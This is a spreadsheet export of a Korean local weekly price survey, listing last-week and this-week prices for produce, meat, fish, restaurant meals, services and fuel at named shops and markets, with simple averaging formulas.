A11: 5 | B11: 애호박 | C11: 상품1개(250~300g) | D11: 2 | E11: 2 | F11: 2190 | G11: 1690 | H11: -500 | I11: 와이마트 | J11: 2380 | K11: 1380 | L11: -1000 | M11: 중마시장 | N11: 2000 | O11: 2000 | P11: 0
A12: 6 | B12: 열무 | C12: 상품 4kg(1단) | D12: 1 | E12: 1 | F12: 17000 | G12: 17000 | H12: 0 | I12: 와이마트 | J12: 0 | K12: 0 | L12: 0 | M12: 중마시장 | N12: 4000 | O12: 4000 | P12: 0
A13: 7 | B13: 양파 | C13: 1망 1kg | D13: 2 | E13: 2 | F13: 2875 | G13: 2990 | H13: 115 | I13: 와이마트 | J13: 2750 | K13: 2980 | L13: 230 | M13: 중마시장 | N13: 3000 | O13: 3000 | P13: 0
A14: 8 | B14: 오이 | C14: 상품 3개 | D14: 2 | E14: 2 | F14: 5175 | G14: 4425 | H14: -750 | I14: 와이마트 | J14: 5850 | K14: 4350 | L14: -1500 | M14: 중마시장 | N14: 4500 | O14: 4500 | P14: 0
A15: 9 | B15: 풋고추 | C15: 신선한것 1kg | D15: 2 | E15: 2 | F15: 12750 | G15: 11000 | H15: -1750 | I15: 와이마트 | J15: 15500 | K15: 12000 | L15: -3500 | M15: 중마시장 | N15: 10000 | O15: 10000 | P15: 0
A16: 10 | B16: 마늘 | C16: 깐것 상품 1kg | D16: 2 | E16: 2 | F16: 9400 | G16: 9400 | H16: 0 | I16: 와이마트 | J16: 9800 | K16: 9800 | L16: 0 | M16: 중마시장 | N16: 9000 | O16: 9000 | P16: 0
A17: 11 | B17: 감자 | C17: 흰색 1kg | D17: 2 | E17: 2 | F17: 3750 | G17: 3650 | H17: -100 | I17: 와이마트 | J17: 4500 | K17: 4300 | L17: -200 | M17: 중마시장 | N17: 3000 | O17: 3000 | P17: 0
A18: 12 | B18: 배추 | C18: 1포기 3kg | D18: 2 | E18: 2 | F18: 3540 | G18: 3540 | H18: 0 | I18: 와이마트 | J18: 3080 | K18: 3080 | L18: 0 | M18: 중마시장 | N18: 4000 | O18: 4000 | P18: 0
A19: 13 | B19: 콩나물 | C19: 1봉지 500g | D19: 2 | E19: 2 | F19: 1650 | G19: 1650 | H19: 0 | I19: 와이마트 | J19: 2300 | K19: 2300 | L19: 0 | M19: 중마시장 | N19: 1000 | O19: 1000 | P19: 0
A20: 14 | B20: 사과 | C20: 상품 1개(300∼350g) | D20: 2 | E20: 2 | F20: 3375 | G20: 3550 | H20: 175 | I20: 와이마트 | J20: 3750 | K20: 3600 | L20: -150 | M20: 중마시장 | N20: 3000 | O20: 3500 | P20: 500
A21: 15 | B21: 배 | C21: 상품 1개(650∼700g) | D21: 2 | E21: 2 | F21: 3000 | G21: 3000 | H21: 0 | I21: 와이마트 | J21: 3000 | K21: 3000 | L21: 0 | M21: 중마시장 | N21: 3000 | O21: 3000 | P21: 0
A22: 16 | B22: 바나나 | C22: 상품 1kg | D22: 2 | E22: 2 | F22: 4050 | G22: 4105 | H22: 55 | I22: 와이마트 | J22: 4100 | K22: 4210 | L22: 110 | M22: 중마시장 | N22: 4000 | O22: 4000 | P22: 0
A23: 17 | B23: 쇠고기 (한우) | C23: 등심 600g(상등육) | D23: 2 | E23: 2 | F23: 63700 | G23: 59400 | H23: -4300 | I23: 와이마트 | J23: 62000 | K23: 59400 | L23: -2600 | M23: 롯데슈퍼 | N23: 65400 | O23: 59400 | P23: -6000
A24: 18 | B24: 쇠고기 (수입육) | C24: 등심 600g(상등육) | D24: 1 | E24: 1 | F24: 13000 | G24: 13000 | H24: 0 | I24: 와이마트 | J24: 13000 | K24: 13000 | L24: 0 | M24: 롯데슈퍼 | N24: 0 | O24: 0 | P24: 0
A25: 19 | B25: 돼지고기 | C25: 삼겹살 600g(상등육) | D25: 2 | E25: 2 | F25: 13690 | G25: 14590 | H25: 900 | I25: 와이마트 | J25: 14280 | K25: 15480 | L25: 1200 | M25: 롯데슈퍼 | N25: 13100 | O25: 13700 | P25: 600
A26: 20 | B26: 닭고기 | C26: 육계 1마리(1kg 정도) | D26: 2 | E26: 2 | F26: =IF(D26=0,0,SUM(J26,N26)/D26) -> 7750 | G26: =IF(E26=0,0,SUM(K26,O26)/E26) -> 7950 | H26: 200 | I26: 와이마트 | J26: 6500 | K26: 6900 | L26: 400 | M26: 중마시장 | N26: 9000 | O26: 9000 | P26: 0
A27: 21 | B27: 달걀 | C27: 특란 30개 한판 | D27: 2 | E27: 2 | F27: =IF(D27=0,0,SUM(J27,N27)/D27) -> 8300 | G27: 8300 | H27: 0 | I27: 와이마트 | J27: 7600 | K27: 7600 | L27: 0 | M27: 중마시장 | N27: 9000 | O27: 9000 | P27: 0
A28: 22 | B28: 조기 | C28: 15cm 1마리 | D28: 2 | E28: 2 | F28: 1243.5 | G28: 1243.5 | H28: 0 | I28: 와이마트 | J28: 987 | K28: 987 | L28: 0 | M28: 중마시장 | N28: 1500 | O28: 1500 | P28: 0
A29: 23 | B29: 갈치 | C29: 60cm 1마리 | D29: 2 | E29: 2 | F29: 15250 | G29: 14250 | H29: -1000 | I29: 와이마트 | J29: 13500 | K29: 13500 | L29: 0 | M29: 중마시장 | N29: 17000 | O29: 15000 | P29: 0
A30: 24 | B30: 명태 | C30: 40cm 1마리 | D30: 2 | E30: 2 | F30: 4450 | G30: 4950 | H30: 500 | I30: 와이마트 | J30: 4900 | K30: 4900 | L30: 0 | M30: 중마시장 | N30: 4000 | O30: 5000 | P30: 1000
A31: 25 | B31: 고등어 | C31: 30cm 1마리 | D31: 2 | E31: 2 | F31: 4900 | G31: 4900 | H31: 0 | I31: 와이마트 | J31: 5800 | K31: 5800 | L31: 0 | M31: 중마시장 | N31: 4000 | O31: 4000 | P31: 0
A32: 26 | B32: 냉동오징어 | C32: 30cm 1마리 | D32: 2 | E32: 2 | F32: 6800 | G32: 6800 | H32: 0 | I32: 와이마트 | J32: 6600 | K32: 6600 | L32: 0 | M32: 중마시장 | N32: 7000 | O32: 7000 | P32: 0
A33: 27 | B33: 콩 | C33: 상품 1kg | D33: 2 | E33: 2 | F33: 11900 | G33: 11900 | H33: 0 | I33: 와이마트 | J33: 14500 | K33: 14500 | L33: 0 | M33: 중마시장 | N33: 15000 | O33: 15000 | P33: 0
A34: 28 | B34: 고춧가루 | C34: 상품 3kg | D34: 2 | E34: 2 | F34: 81250 | G34: 81250 | H34: 0 | I34: 와이마트 | J34: 89400 | K34: 89400 | L34: 0 | M34: 중마시장 | N34: 85000 | O34: 85000 | P34: 0
A35: 개인서비스 요금(49개 품목)
A36: 1 | B36: 설렁탕 | C36: 1인분 (보통) | D36: =COUNTIF(J36,"<>0")+COUNTIF(N36,"<>0") -> 2 | E36: 2 | F36: =IF(D36=0,0,SUM(J36,N36)/D36) -> 10000 | G36: 10000 | H36: =G36-F36 -> 0 | I36: 큰집설렁탕 | J36: 10000 | K36: 10000 | L36: =K36-J36 -> 0 | M36: 종가집설렁탕 | N36: 10000 | O36: 10000 | P36: =O36-N36 -> 0
A37: 2 | B37: 냉면 | C37: 물냉면, 1인분(보통) | D37: 2 | E37: 2 | F37: 12000 | G37: 12000 | H37: 0 | I37: 황초갈비냉면 | J37: 13000 | K37: 13000 | L37: 0 | M37: 진주황포냉면 | N37: 11000 | O37: 11000 | P37: 0
A38: 3 | B38: 비빔밥 | C38: 1인분(보통) | D38: 2 | E38: 2 | F38: 7500 | G38: 7500 | H38: 0 | I38: 김밥천국 | J38: 6000 | K38: 6000 | L38: 0 | M38: 학운정 | N38: 9000 | O38: 9000 | P38: 0
A39: 4 | B39: 갈비탕 | C39: 1인분(보통) | D39: 2 | E39: 2 | F39: 14000 | G39: 14000 | H39: 0 | I39: 백운목장 | J39: 13000 | K39: 13000 | L39: 0 | M39: 바우네나주곰탕 | N39: 15000 | O39: 15000 | P39: 0
A40: 5 | B40: 삼계탕 | C40: 1인분(보통) | D40: 2 | E40: 2 | F40: 15500 | G40: 15500 | H40: 0 | I40: 지호삼계탕 | J40: 17000 | K40: 17000 | L40: 0 | M40: 대복삼계탕 | N40: 14000 | O40: 14000 | P40: 0
A41: 6 | B41: 된장찌개 백반 | C41: 1인분(보통) | D41: 2 | E41: 2 | F41: 8000 | G41: 8000 | H41: 0 | I41: 덕이네식당 | J41: 8000 | K41: 8000 | L41: 0 | M41: 맛사랑 | N41: 8000 | O41: 8000 | P41: 0
A42: 7 | B42: 김치찌개 백반 | C42: 1인분(보통) | D42: 2 | E42: 2 | F42: 8000 | G42: 8000 | H42: 0 | I42: 판문점 | J42: 8000 | K42: 8000 | L42: 0 | M42: 맛사랑 | N42: 8000 | O42: 8000 | P42: 0
A43: 8 | B43: 불고기 | C43: 1인분(200g) 공기밥 제외 | D43: 2 | E43: 2 | F43: 23500 | G43: 23500 | H43: 0 | I43: 금정 | J43: 24000 | K43: 24000 | L43: 0 | M43: 백운목장 | N43: 23000 | O43: 23000 | P43: 0
A44: 9 | B44: 등심구이 | C44: 1인분(200g) 공기밥 제외 | D44: 2 | E44: 2 | F44: 40000 | G44: 40000 | H44: 0 | I44: 한마음회관 | J44: 40000 | K44: 40000 | L44: 0 | M44: 한마당생고기 | N44: 40000 | O44: 40000 | P44: 0
A45: 10 | B45: 생선초밥 | C45: 1인분(보통), 활어기준 | D45: 2 | E45: 2 | F45: 17500 | G45: 17500 | H45: 0 | I45: 광양초밥 | J45: 19000 | K45: 19000 | L45: 0 | M45: 대길초밥 | N45: 16000 | O45: 16000 | P45: 0
A46: 11 | B46: 튀김닭 | C46: 양념통닭 1마리 | D46: 2 | E46: 2 | F46: 19000 | G46: 19000 | H46: 0 | I46: 멕시카나 | J46: 18000 | K46: 18000 | L46: 0 | M46: BHC | N46: 20000 | O46: 20000 | P46: 0
A47: 12 | B47: 칼국수 | C47: 1인분(보통) | D47: 2 | E47: 2 | F47: 7500 | G47: 7500 | H47: 0 | I47: 밀밭해물칼국수 | J47: 8000 | K47: 8000 | L47: 0 | M47: 정인정칼국수 | N47: 7000 | O47: 7000 | P47: 0
A48: 13 | B48: 조리라면 | C48: 분식점 1인분 | D48: 2 | E48: 2 | F48: 4250 | G48: 4250 | H48: 0 | I48: 김밥나라중동무등점 | J48: 4000 | K48: 4000 | L48: 0 | M48: 김가네 | N48: 4500 | O48: 4500 | P48: 0
A49: 14 | B49: 김밥 | C49: 분식점 1인분 | D49: 2 | E49: 2 | F49: 3500 | G49: 3500 | H49: 0 | I49: 김밥나라중동무등점 | J49: 3500 | K49: 3500 | L49: 0 | M49: 김가네 | N49: 3500 | O49: 3500 | P49: 0
A50: 15 | B50: 짜장면 | C50: 1인분(보통) | D50: 2 | E50: 2 | F50: 5450 | G50: 5450 | H50: 0 | I50: 봄차이나 | J50: 5900 | K50: 5900 | L50: 0 | M50: 시장중화요리 | N50: 5000 | O50: 5000 | P50: 0
A51: 16 | B51: 짬뽕 | C51: 1인분(보통) | D51: 2 | E51: 2 | F51: 6450 | G51: 6450 | H51: 0 | I51: 봄차이나 | J51: 6900 | K51: 6900 | M51: 시장중화요리 | N51: 6000 | O51: 6000 | P51: 0
A52: 17 | B52: 탕수육 | C52: 일반탕수육(보통) | D52: 2 | E52: 2 | F52: 18000 | G52: 18000 | H52: 0 | I52: 봄차이나 | J52: 21000 | K52: 21000 | L52: 0 | M52: 시장중화요리 | N52: 15000 | O52: 15000 | P52: 0
A53: 18 | B53: 돈가스 | C53: 일반돈가스,1인분 | D53: 2 | E53: 2 | F53: 7950 | G53: 7950 | H53: 0 | I53: 돈비가 | J53: 7900 | K53: 7900 | L53: 0 | M53: 용우동 | N53: 8000 | O53: 8000 | P53: 0
A54: 19 | B54: 햄버거 | C54: 기본형(야채,고기) | D54: 2 | E54: 2 | F54: 4900 | G54: 4900 | H54: 0 | I54: 뉴욕버거 | J54: 3900 | K54: 3900 | L54: 0 | M54: 맘스터치 | N54: 5900 | O54: 5900 | P54: 0
A55: 20 | B55: 피자 | C55: 기본형(야채,고기) | D55: 2 | E55: 2 | F55: 19900 | G55: 19900 | H55: 0 | I55: 피자마루 | J55: 20900 | K55: 20900 | L55: 0 | M55: 청년피자 | N55: 18900 | O55: 18900 | P55: 0
A56: 21 | B56: 커피(외식) | C56: 일반원두커피 | D56: 2 | E56: 2 | F56: 3350 | G56: 3350 | H56: 0 | I56: 이디아커피 | J56: 3200 | K56: 3200 | L56: 0 | M56: 엔젤인어스 | N56: 3500 | O56: 3500 | P56: 0
A57: 22 | B57: 국산차(외식) | C57: 녹차(티백 또는 잎녹차) | D57: 1 | E57: 1 | F57: 3200 | G57: 3200 | H57: 0 | I57: 이디아커피 | J57: 3200 | K57: 3200 | L57: 0 | M57: 엔젤인어스 | N57: 0 | O57: 0 | P57: 0
A58: 23 | B58: 삼겹살 | C58: 식육식당 200g(국내산) | D58: 2 | E58: 2 | F58: 15716.5 | G58: 15716.5 | H58: 0 | I58: 한마당생고기 | J58: 14100 | K58: 14100 | L58: 0 | M58: 한마음회관 | N58: 17333 | O58: 17333 | P58: 0
A59: 24 | B59: 돼지갈비 | C59: 식육식당 200g(국내산) | D59: 2 | E59: 2 | F59: 11500 | G59: 11500 | H59: 0 | I59: 판문점 | J59: 10000 | K59: 10000 | L59: 0 | M59: 한마음회관 | N59: 13000 | O59: 13000 | P59: 0
A60: 25 | B60: 쇠갈비 | C60: 식육식당 200g(국내산) | D60: 0 | E60: 0 | F60: 0 | G60: 0 | H60: 0 | J60: 0 | K60: 0 | L60: 0 | N60: 0 | O60: 0 | P60: 0
A61: 26 | B61: 생맥주 | C61: 500CC 1잔 | D61: 2 | E61: 2 | F61: 3750 | G61: 3750 | H61: 0 | I61: 투다리 | J61: 4000 | K61: 4000 | L61: 0 | M61: 까투리 | N61: 3500 | O61: 3500 | P61: 0
A62: 27 | B62: 공동 주택관리비 | C62: 주공 18평1개월 (공과금 제외) | D62: 2 | E62: 2 | F62: 71130 | G62: 71130 | H62: 0 | I62: 주공2차아파트 | J62: 69460 | K62: 69460 | L62: 0 | M62: 선우아파트 | N62: 72800 | O62: 72800 | P62: 0
A63: 28 | B63: 양 복 세탁료 | C63: 신사복 상·하 드라이크리닝 1회 | D63: 2 | E63: 2 | F63: 9000 | G63: 9000 | H63: 0 | I63: 모아모아빨래방 | J63: 5000 | K63: 5000 | L63: 0 | M63: 드라이하우스 | N63: 13000 | O63: 13000 | P63: 0
A64: 29 | B64: 의복수선료 | C64: 신사복 바지 밑단줄임 1회 | D64: 2 | E64: 2 | F64: 4500 | G64: 4500 | H64: 0 | I64: 모아모아빨래방 | J64: 4000 | K64: 4000 | L64: 0 | M64: 드라이하우스 | N64: 5000 | O64: 5000 | P64: 0
A65: 30 | B65: 영화관람요 (방화. 외화) | C65: 상영시간 100분정도 1회 (입장세,문예진흥기금포함) | D65: 0 | E65: 0 | F65: 0 | G65: 0 | H65: 0 | J65: 0 | K65: 0 | L65: 0 | N65: 0 | O65: 0 | P65: 0
A66: 31 | B66: 경기장 입장료 | C66: 공공체육시설 (성인 1인) | D66: 0 | E66: 0 | F66: 0 | G66: 0 | H66: 0 | J66: 0 | K66: 0 | L66: 0 | N66: 0 | O66: 0 | P66: 0
A67: 32 | B67: 수영장 이용료 | C67: 일반성인 1회 (체육기금 포함) | D67: 0 | E67: 0 | F67: 0 | G67: 0 | H67: 0 | I67: 커뮤니티센터 | J67: 0 | K67: 0 | L67: 0 | N67: 0 | O67: 0 | P67: 0
A68: 33 | B68: 볼링장 이용료 | C68: 일반성인 평일오후 1게임 | D68: 2 | E68: 2 | F68: 4000 | G68: 4000 | H68: 0 | I68: 가야볼링장 | J68: 4000 | K68: 4000 | L68: 0 | N68: 4000 | O68: 4000 | P68: 0
A69: 34 | B69: 골프연습장 이용료 | C69: 초급(남자회원)1개월 (레슨비 미포함) | D69: 2 | E69: 2 | F69: 225000 | G69: 225000 | H69: 0 | I69: 제이골프아카데미 | J69: 250000 | K69: 250000 | L69: 0 | M69: 체인지골프아카데미 | N69: 200000 | O69: 200000 | P69: 0
A70: 35 | B70: 노래방 이용료 | C70: 일반인 저녁 1시간 | D70: 2 | E70: 2 | F70: 20000 | G70: 20000 | H70: 0 | I70: 솔로몬노래연습장 | J70: 20000 | K70: 20000 | L70: 0 | M70: 좋아좋아노래연습장 | N70: 20000 | O70: 20000 | P70: 0
A71: 36 | B71: 당구장 이용료 | C71: 큐선대 일반인 저녁 1시간 | D71: 2 | E71: 2 | F71: 10000 | G71: 10000 | H71: 0 | I71: 진당구클럽 | J71: 10000 | K71: 10000 | L71: 0 | M71: 발섬당구장 | N71: 10000 | O71: 10000 | P71: 0
A72: 37 | B72: 사진촬영료 | C72: 칼라 반명함 1조 (상급사진관 3x4) | D72: 2 | E72: 2 | F72: 19000 | G72: 19000 | H72: 0 | I72: 명진포토샵 | J72: 18000 | K72: 18000 | L72: 0 | M72: 코코포토 | N72: 20000 | O72: 20000 | P72: 0
A73: 38 | B73: 사진인화료 | C73: 디지털사진인화요금, 현상료 포함 | D73: 2 | E73: 2 | F73: 400 | G73: 400 | H73: 0 | I73: 명진포토샵 | J73: 300 | K73: 300 | L73: 0 | M73: 코코포토 | N73: 500 | O73: 500 | P73: 0
A74: 39 | B74: 영상매체대여료 | C74: 최신판 영화 DVD대여요금 | D74: 0 | E74: 0 | F74: 0 | G74: 0 | H74: 0 | J74: 0 | K74: 0 | L74: 0 | N74: 0 | O74: 0 | P74: 0
A75: 40 | B75: 이용료(컷트) | C75: 성인조발 중류급 1회 | D75: 2 | E75: 2 | F75: 14000 | G75: 14000 | H75: 0 | I75: 커트맨 | J75: 10000 | K75: 10000 | L75: 0 | M75: 중앙이용원 | N75: 18000 | O75: 18000 | P75: 0
A76: 41 | B76: 미용료 | C76: 성인여자 파마(일반) | D76: 2 | E76: 2 | F76: 32500 | G76: 32500 | H76: 0 | I76: 한가을헤어샵 | J76: 35000 | K76: 35000 | L76: 0 | M76: 아이리스헤어 | N76: 30000 | O76: 30000 | P76: 0
A77: 42 | B77: 목욕료 (성인) | C77: 대중탕(성인 1회) (1회용품 제외) | D77: 1 | E77: 1 | F77: 8000 | G77: 8000 | H77: 0 | I77: 백운사우나 | J77: 8000 | K77: 8000 | L77: 0 | N77: 0 | O77: 0 | P77: 0
A78: 43 | B78: 숙박료 (호텔) | C78: 평일, 스탠다드,부가세 및 봉사료 포함 | D78: 0 | E78: 0 | F78: 0 | G78: 0 | H78: 0 | J78: 0 | K78: 0 | L78: 0 | N78: 0 | O78: 0 | P78: 0
A79: 44 | B79: 숙박료 (여관) | C79: 독방, 1박, 욕탕부설 | D79: 2 | E79: 2 | F79: 40000 | G79: 40000 | H79: 0 | I79: 리베라모텔 | J79: 40000 | K79: 40000 | L79: 0 | M79: 유토피아모텔 | N79: 40000 | O79: 40000 | P79: 0
A80: 45 | B80: 콘도미니엄 이용료 | C80: 25평정도 회원기준 1실 1일 사용 | D80: 0 | E80: 0 | F80: 0 | G80: 0 | H80: 0 | J80: 0 | K80: 0 | L80: 0 | N80: 0 | O80: 0 | P80: 0
A81: 46 | B81: PC방 이용료 | C81: 1회 이용시 | D81: 2 | E81: 2 | F81: 1000 | G81: 1000 | H81: 0 | I81: PC토랑 | J81: 1000 | K81: 1000 | L81: 0 | M81: 3POP피시방 | N81: 1000 | O81: 1000 | P81: 0
A82: 47 | B82: 택배이용료 | C82: 20kg이하, 타지역 | D82: 2 | E82: 2 | F82: 6750 | G82: 6750 | H82: 0 | I82: 경동택배 | J82: 6500 | K82: 6500 | L82: 0 | M82: 한진택배 | N82: 7000 | O82: 7000 | P82: 0
A83: 48 | B83: 찜질방 이용료 | C83: 찜질방(성인 1회) (1회용품 제외) | D83: 2 | E83: 2 | F83: 0 | G83: 0 | H83: 0 | L83: 0 | P83: 0
A84: 49 | B84: 대입학원비(종합) | C84: 대입(4년제)재수생 종합반 수강료 | D84: 2 | E84: 2 | F84: 0 | G84: 0 | H84: 0 | L84: 0 | P84: 0
A85: 공산품 등 기타(13개품목)
A86: 1 | B86: 밀가루 | C86: 중력분 1등품 (1봉지 3kg) | D86: =COUNTIF(J86,"<>0")+COUNTIF(N86,"<>0") -> 2 | E86: 2 | F86: =IF(D86=0,0,SUM(J86,N86)/D86) -> 6335 | G86: 6335 | H86: =G86-F86 -> 0 | I86: 와이마트 | J86: 6250 | K86: 6250 | L86: =K86-J86 -> 0 | M86: 롯데슈퍼 | N86: 6420 | O86: 6420 | P86: =O86-N86 -> 0
A87: 2 | B87: 두부 | C87: 공장제품 1모 | D87: 2 | E87: 2 | F87: 1425 | G87: 1425 | H87: 0 | I87: 와이마트 | J87: 1400 | K87: 1400 | L87: 0 | M87: 롯데슈퍼 | N87: 1450 | O87: 1450 | P87: 0
A88: 3 | B88: 우유 | C88: 흰 우유(종이팩) 1개 200㎖ | D88: 2 | E88: 2 | F88: 1175 | G88: 1175 | H88: 0 | I88: 와이마트 | J88: 1200 | K88: 1200 | L88: 0 | M88: 롯데슈퍼 | N88: 1150 | O88: 1150 | P88: 0
A89: 4 | B89: 식용유 | C89: 콩기름 1.8ml | D89: 2 | E89: 2 | F89: 9765 | G89: 9765 | H89: 0 | I89: 와이마트 | J89: 8550 | K89: 8550 | L89: 0 | M89: 롯데슈퍼 | N89: 10980 | O89: 10980 | P89: 0
A90: 5 | B90: 설탕 | C90: 정백당 1kg | D90: 2 | E90: 2 | F90: 2645 | G90: 2645 | H90: 0 | I90: 와이마트 | J90: 2500 | K90: 2500 | L90: 0 | M90: 롯데슈퍼 | N90: 2790 | O90: 2790 | P90: 0
A91: 6 | B91: 생수 | C91: 플라스틱 1병(500㎖) | D91: 2 | E91: 2 | F91: 540 | G91: 540 | H91: 0 | I91: 와이마트 | J91: 550 | K91: 550 | L91: 0 | M91: 롯데슈퍼 | N91: 530 | O91: 530 | P91: 0
A92: 7 | B92: 맥주 | C92: 1병 500㎖ (병 보증금 포함) | D92: 2 | E92: 2 | F92: 1820 | G92: 1820 | H92: 0 | I92: 와이마트 | J92: 1680 | K92: 1680 | L92: 0 | M92: 롯데슈퍼 | N92: 1830 | O92: 1830 | P92: 0
A93: 8 | B93: 소주 | C93: 1병 360㎖ (병 보증금 포함) | D93: 2 | E93: 2 | F93: =IF(D93=0,0,SUM(J93,N93)/D93) -> 1525 | G93: =IF(E93=0,0,SUM(K93,O93)/E93) -> 1525 | H93: 0 | I93: 와이마트 | J93: 1490 | K93: 1490 | L93: 0 | M93: 롯데슈퍼 | N93: 1560 | O93: 1560 | P93: 0
A94: 9 | B94: 등유 | C94: 주유소 판매 1ℓ | D94: 0 | E94: 0 | F94: 0 | G94: 0 | H94: 0 | I94: SK고향주유소 | J94: 0 | K94: 0 | L94: 0 | M94: GS태양점 | N94: 0 | O94: 0 | P94: 0
A95: 10 | B95: 경유 | C95: 주유소 판매 1ℓ | D95: 2 | E95: 2 | F95: =IF(D95=0,0,SUM(J95,N95)/D95) -> 1588 | G95: 1571.5 | H95: -16.5 | I95: SK고향주유소 | J95: 1598 | K95: 1598 | L95: 0 | M95: GS태양점 | N95: 1578 | O95: 1545 | P95: -33
A96: 11 | B96: 휘발유 | C96: 주유소 판매 1ℓ (무연) | D96: 2 | E96: 2 | F96: =IF(D96=0,0,SUM(J96,N96)/D96) -> 1608.5 | G96: 1601.5 | H96: -7 | I96: SK고향주유소 | J96: 1608 | K96: 1608 | L96: 0 | M96: GS태양점 | N96: 1609 | O96: 1595 | P96: -14
A97: 12 | B97: 피아노 학원비 | C97: 관인학원 (초급반 1개월) | D97: 2 | E97: 2 | F97: =IF(D97=0,0,SUM(J97,N97)/D97) -> 150000 | G97: 150000 | H97: 0 | I97: 피앤플음악학원 | J97: 150000 | K97: 150000 | L97: 0 | M97: 음사랑음악학원 | N97: 150000 | O97: 150000 | P97: 0
A98: 13 | B98: 미술학원비 | C98: 초등 저학년 1개월 (재료비 포함) | D98: 2 | E98: 2 | F98: =IF(D98=0,0,SUM(J98,N98)/D98) -> 150000 | G98: 150000 | H98: 0 | I98: 하늘담은미술 | J98: 140000 | K98: 140000 | L98: 0 | M98: 예초미술학원 | N98: 160000 | O98: 160000 | P98: 0

Sheet 광영동
A2: 주 간 물 가 동 향(광영동) 조사자:진옥윤
M3: 조사자 : 진옥윤
A4: 연번 | B4: 품목 | C4: 규격·단위 | F4: 평 균 | I4: 조 사 1 지 역 (광영농협) | M4: 조 사 2 지 역 (광영시장)
F5: 전주 | G5: 금주 | H5: 증감액 | I5: 조 사 처 | J5: 전주 | K5: 금주 | L5: 증감액 | M5: 조 사 처 | N5: 전주 | O5: 금주 | P5: 증감액
A6: 농·축·수산물(26개 품목)
A7: 1 | B7: 쌀 | C7: 일반미 20kg(웰빙간척) | D7: 2 | E7: =COUNTIF(K7,"<>0")+COUNTIF(O7,"<>0") -> 2 | F7: =IF(D7=0,0,SUM(J7,N7)/D7) -> 57,800 | G7: 57,800 | H7: =G7-F7 -> 0 | I7: 광영농협 | J7: 55,800 | K7: 55,800 | L7: =K7-J7 -> 0 | M7: 지마트(햅쌀) | N7: 59,800 | O7: 59,800 | P7: =O7-N7 -> 0
A8: 2 | B8: 무 | C8: 상품 1개(1㎏) | D8: =COUNTIF(J8,"<>0")+COUNTIF(N8,"<>0") -> 2 | E8: 2 | F8: 1,300 | G8: 1,000 | H8: -300 | I8: 광영농협 | J8: 1,600 | K8: 1,000 | L8: -600 | M8: 광영시장 | N8: 1,000 | O8: 1,000 | P8: 0
A9: 3 | B9: 상추 | C9: 잎상추 500g | D9: 2 | E9: 2 | F9: 5,500 | G9: 5,500 | H9: 0 | I9: 광영농협 | J9: 6,000 | K9: 6,000 | L9: 0 | M9: 광영시장 | N9: 5,000 | O9: 5,000 | P9: 0
A10: 4 | B10: 양상추 | C10: 상품1개(350~400g) | D10: 2 | E10: 2 | F10: 2,400 | G10: 2,400 | H10: 0 | I10: 광영농협 | J10: 2,300 | K10: 2,300 | L10: 0 | M10: 광영시장 | N10: 2,500 | O10: 2,500 | P10: 0
A11: 5 | B11: 애호박 | C11: 상품1개(300~350g) | D11: 2 | E11: 2 | F11: 1,550 | G11: 1,550 | H11: 0 | I11: 광영농협 | J11: 1,600 | K11: 1,600 | L11: 0 | M11: 광영시장 | N11: 1,500 | O11: 1,500 | P11: 0
A12: 6 | B12: 열무 | C12: 상품 4kg(1단) | D12: 2 | E12: =COUNTIF(K12,"<>0")+COUNTIF(O12,"<>0") -> 2 | F12: 8,500 | G12: 0 | H12: -8,500 | I12: 광영농협 | J12: 9,000 | K12: 없음 | M12: 광영시장 | N12: 8,000 | O12: 없음
A13: 7 | B13: 양파 | C13: 1망 1kg | D13: =COUNTIF(J13,"<>0")+COUNTIF(N13,"<>0") -> 2 | E13: 2 | F13: 1,990 | G13: 1,990 | H13: 0 | I13: 광영농협 | J13: 1,980 | K13: 1,980 | L13: 0 | M13: 광영시장 | N13: 2,000 | O13: 2,000 | P13: 0
A14: 8 | B14: 오이 | C14: 상품 3개 | D14: 2 | E14: =COUNTIF(K14,"<>0")+COUNTIF(O14,"<>0") -> 2 | F14: 3,750 | G14: 5,550 | H14: 1,800 | I14: 광영농협 | J14: 4,500 | K14: 6,600 | L14: 2,100 | M14: 광영시장 | N14: 3,000 | O14: 4,500 | P14: 1,500
A15: 9 | B15: 풋고추 | C15: 신선한것 1kg | D15: 2 | E15: 2 | F15: 8,950 | G15: 8,950 | H15: 0 | I15: 광영농협 | J15: 8,900 | K15: 8,900 | L15: 0 | M15: 광영시장 | N15: 9,000 | O15: 9,000 | P15: 0
A16: 10 | B16: 마늘 | C16: 깐것 상품 1kg | D16: 2 | E16: 2 | F16: 8,950 | G16: 7,950 | H16: -1,000 | I16: 광영농협 | J16: 8,900 | K16: 6,900 | L16: -2,000 | M16: 광영시장 | N16: 9,000 | O16: 9,000 | P16: 0
A17: 11 | B17: 감자 | C17: 흰색 1kg | D17: 2 | E17: 2 | F17: 3,450 | G17: 3,450 | H17: 0 | I17: 광영농협 | J17: 3,900 | K17: 3,900 | L17: 0 | M17: 광영시장 | N17: 3,000 | O17: 3,000 | P17: 0
A18: 12 | B18: 배추 | C18: 1포기 3kg | D18: 2 | E18: 2 | F18: 3,500 | G18: 3,500 | H18: 0 | I18: 광영농협 | J18: 3,000 | K18: 3,000 | L18: 0 | M18: 광영시장 | N18: 4,000 | O18: 4,000 | P18: 0
A19: 13 | B19: 콩나물 | C19: 1봉지 500g | D19: 2 | E19: 2 | F19: 1,490 | G19: 1,490 | H19: 0 | I19: 광영농협 | J19: 1,980 | K19: 1,980 | L19: 0 | M19: 광영시장 | N19: 1,000 | O19: 1,000 | P19: 0
A20: 14 | B20: 사과 | C20: 상품 1개(300∼350g) | D20: 2 | E20: 2 | F20: 4,950 | G20: 4,950 | H20: 0 | I20: 광영농협 | J20: 4,900 | K20: 4,900 | L20: 0 | M20: 광영시장 | N20: 5,000 | O20: 5,000 | P20: 0
A21: 15 | B21: 배 | C21: (600-700) | D21: 2 | E21: 2 | F21: 4,450 | G21: 4,450 | H21: 0 | I21: 광영농협 | J21: 4,900 | K21: 4,900 | L21: 0 | M21: 광영시장 | N21: 4,000 | O21: 4,000 | P21: 0
A22: 16 | B22: 바나나 | C22: 상품 1kg | D22: 2 | E22: 2 | F22: 4,250 | G22: 4,250 | H22: 0 | I22: 광영농협 | J22: 4,500 | K22: 4,500 | L22: 0 | M22: 광영시장 | N22: 4,000 | O22: 4,000 | P22: 0
A23: 17 | B23: 쇠고기 (한우) | C23: 등심 600g(상등육) | D23: 2 | E23: 2 | F23: 52,500 | G23: 47,400 | H23: -5,100 | I23: 광영농협 | J23: 57,000 | K23: 46,800 | L23: -10,200 | M23: 광영시장 | N23: 48,000 | O23: 48,000 | P23: 0
